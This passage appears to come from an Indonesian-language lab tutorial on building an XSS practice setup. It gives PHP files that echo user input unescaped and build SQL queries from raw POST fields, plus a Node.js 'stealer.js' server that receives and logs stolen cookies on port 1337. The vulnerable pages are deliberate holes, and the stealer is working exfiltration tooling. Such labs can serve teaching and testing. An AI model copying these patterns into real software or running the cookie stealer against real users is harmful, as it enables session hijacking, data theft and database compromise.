<?php
if (isset($_GET['name'])) {
  echo "Hello, " . $_GET['name'];
}
?>
6. Buat file save_comment.phpÂ
<?php
$conn = new mysqli("localhost", "root", "", "xss_advanced");
$username = $_POST['username'];
$comment = $_POST['comment'];
$conn->query("INSERT INTO comments (username, comment) VALUES ('$username', '$comment')");
echo "Komentar berhasil disimpan.<br>";
echo "<a href='view_comments.php'>Lihat Komentar</a>";
?>
7. Buat file view_comments.php
<?php
$conn = new mysqli("localhost", "root", "", "xss_advanced");
$result = $conn->query("SELECT * FROM comments");
while ($row = $result->fetch_assoc()) {
  echo "<b>" . $row['username'] . "</b>: " . $row['comment'] . "<br><hr>";
}
?>
8. Buat file stealer.jsÂ
const http = require('http');
const fs = require('fs');
http.createServer((req, res) => {
  const url = require('url').parse(req.url, true);
  if (url.pathname === '/steal') {
    const log = `Stolen cookie: ${url.query.c}\n`;
    fs.appendFileSync('stolen_cookies.txt', log);
    res.end("OK");
  } else {
    res.end("Nothing here.");
  }
}).listen(1337);
